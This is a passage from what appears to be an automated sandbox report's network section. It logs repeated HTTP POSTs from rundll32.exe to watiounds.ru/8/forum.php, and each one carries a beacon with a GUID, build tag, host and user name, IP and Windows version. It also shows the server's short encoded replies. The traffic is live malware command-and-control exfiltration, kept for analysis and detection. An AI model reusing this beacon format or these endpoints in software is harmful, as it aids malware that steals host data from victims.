                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:21.356631994 CEST | 472 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFVEUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          391 | 192.168.2.22 | 49556 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:21.675245047 CEST | 473 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:21.807295084 CEST | 473 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          392 | 192.168.2.22 | 49557 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:22.122312069 CEST | 474 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:22.244584084 CEST | 474 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          393 | 192.168.2.22 | 49558 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:22.560925961 CEST | 475 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:22.684420109 CEST | 475 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJTGQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          394 | 192.168.2.22 | 49559 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:23.007167101 CEST | 476 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:23.135772943 CEST | 476 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 42 59 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCBYXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          4 | 192.168.2.22 | 49169 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:17:16.999990940 CEST | 12 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:17.125000000 CEST | 12 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 43 58 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJCXQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          40 | 192.168.2.22 | 49205 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:41.473452091 CEST | 80 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:41.605170012 CEST | 80 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          41 | 192.168.2.22 | 49206 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:41.939635038 CEST | 81 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:42.068002939 CEST | 81 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNAZMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          42 | 192.168.2.22 | 49207 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:42.398436069 CEST | 82 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:42.526041985 CEST | 82 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          43 | 192.168.2.22 | 49208 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:42.877315044 CEST | 83 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:43.008730888 CEST | 83 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          44 | 192.168.2.22 | 49209 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:43.340709925 CEST | 84 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:43.468060017 CEST | 85 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJKPQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          45 | 192.168.2.22 | 49210 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:43.860219002 CEST | 85 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:43.992841005 CEST | 86 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQBYJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          46 | 192.168.2.22 | 49211 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:44.323410034 CEST | 86 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:44.447103977 CEST | 87 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZHSAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          47 | 192.168.2.22 | 49212 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:45.077863932 CEST | 88 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:45.200917006 CEST | 88 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVJQEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          48 | 192.168.2.22 | 49213 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:46.012943029 CEST | 89 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:46.138381958 CEST | 89 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZCXAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          49 | 192.168.2.22 | 49214 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:46.459232092 CEST | 90 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:46.591547012 CEST | 90 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          5 | 192.168.2.22 | 49170 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:17:32.197963953 CEST | 15 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:32.327707052 CEST | 15 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          50 | 192.168.2.22 | 49215 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:46.919986963 CEST | 91 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
